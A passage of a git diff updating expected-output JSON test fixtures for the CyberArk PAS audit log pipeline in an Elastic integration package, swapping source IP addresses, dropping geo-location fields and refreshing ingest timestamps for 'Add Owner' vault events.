Owner\",\"SourceUser\":\"Auditors\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", 
@@ -516,20 +444,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -550,7 +466,7 @@ "DR Users" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -559,7 +475,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "DR Users", "message": "Add Owner", 
@@ -573,8 +489,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021048500Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"DR Users\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101454Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"DR Users\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", 
@@ -601,20 +517,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -635,7 +539,7 @@ "Notification Engines" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -644,7 +548,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "Notification Engines", "message": "Add Owner", 
@@ -658,8 +562,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021050700Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Notification Engines\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101458100Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Notification Engines\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", 
@@ -686,20 +590,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -720,7 +612,7 @@ "PSMPApp_localhost.localdomain" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -729,7 +621,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:22Z", "safe": "PVWAConfig", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "PSMPApp_localhost.localdomain", "message": "Add Owner", 
@@ -743,8 +635,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021052900Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:22\",\"IsoTimestamp\":\"2021-03-10T09:11:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMPApp_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101462400Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:22\",\"IsoTimestamp\":\"2021-03-10T09:11:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMPApp_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", 
@@ -771,20 +663,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -805,7 +685,7 @@ "PSMAppUsers" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -814,7 +694,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:23Z", "safe": "PSMPLiveSessions", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "PSMAppUsers", "message": "Add Owner", 
@@ -828,8 +708,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021055100Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:23\",\"IsoTimestamp\":\"2021-03-10T09:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101467400Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:23\",\"IsoTimestamp\":\"2021-03-10T09:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", 
@@ -856,20 +736,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -890,7 +758,7 @@ "Vault Admins" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -899,7 +767,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:23Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "Vault Admins", "message": "Add Owner", 
@@ -913,8 +781,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021057400Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:23\",\"IsoTimestamp\":\"2021-03-10T09:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Vault Admins\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101472Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:23\",\"IsoTimestamp\":\"2021-03-10T09:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"Vault Admins\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", 
@@ -941,20 +809,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -975,7 +831,7 @@ "PVWAAppUsers" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -984,7 +840,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:23Z", "safe": "PSMPLiveSessions", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "PVWAAppUsers", "message": "Add Owner", 
@@ -998,8 +854,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021059600Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:23\",\"IsoTimestamp\":\"2021-03-10T09:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PVWAAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101475500Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:23\",\"IsoTimestamp\":\"2021-03-10T09:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PVWAAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", 
@@ -1026,20 +882,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1060,7 +904,7 @@ "PVWAGWAccounts" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -1069,7 +913,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:36Z", "safe": "PSMPADBUserProfile", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "PVWAGWAccounts", "message": "Add Owner", 
@@ -1083,8 +927,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021061900Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:36\",\"IsoTimestamp\":\"2021-03-10T09:11:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBUserProfile\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101479900Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:36\",\"IsoTimestamp\":\"2021-03-10T09:11:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBUserProfile\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", 
@@ -1111,20 +955,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1145,7 +977,7 @@ "PSMP_ADB_localhost.localdomain" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -1154,7 +986,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:37Z", "safe": "PSMPADBridgeConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "PSMP_ADB_localhost.localdomain", "message": "Add Owner", 
@@ -1168,8 +1000,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021064100Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:37\",\"IsoTimestamp\":\"2021-03-10T09:11:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMP_ADB_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBridgeConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101485300Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:37\",\"IsoTimestamp\":\"2021-03-10T09:11:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMP_ADB_localhost.localdomain\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBridgeConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", 
@@ -1196,20 +1028,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1230,7 +1050,7 @@ "PSMP_ADB_AppUsers" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -1239,7 +1059,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:38Z", "safe": "PSMPADBridgeCustom", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "PSMP_ADB_AppUsers", "message": "Add Owner", 
@@ -1253,8 +1073,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021066500Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:38\",\"IsoTimestamp\":\"2021-03-10T09:11:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBridgeCustom\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101490600Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:38\",\"IsoTimestamp\":\"2021-03-10T09:11:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBridgeCustom\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", 
@@ -1281,20 +1101,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1315,7 +1123,7 @@ "PSMApp_VAGRANT" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -1324,7 +1132,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T17:59:32Z", "safe": "PVWAConfig", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Owner", "source_user": "PSMApp_VAGRANT", "message": "Add Owner", 
@@ -1338,8 +1146,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.021068800Z", - "original": "\u003c5\u003e1 2021-03-10T17:59:32Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:32\",\"IsoTimestamp\":\"2021-03-10T17:59:32Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:55.101494300Z", + "original": "\u003c5\u003e1 2021-03-10T17:59:32Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:32\",\"IsoTimestamp\":\"2021-03-10T17:59:32Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"32\",\"Desc\":\"Add Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Owner\",\"SourceUser\":\"PSMApp_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Owner\",\"GatewayStation\":\"\"}}}", "code": "32", "kind": "event", "action": "add owner", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-326-cpm-auto-detection-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-326-cpm-auto-detection-start.log-expected.json index 530242c2c3a..f340629aac8 100644 
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-326-cpm-auto-detection-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-326-cpm-auto-detection-start.log-expected.json 
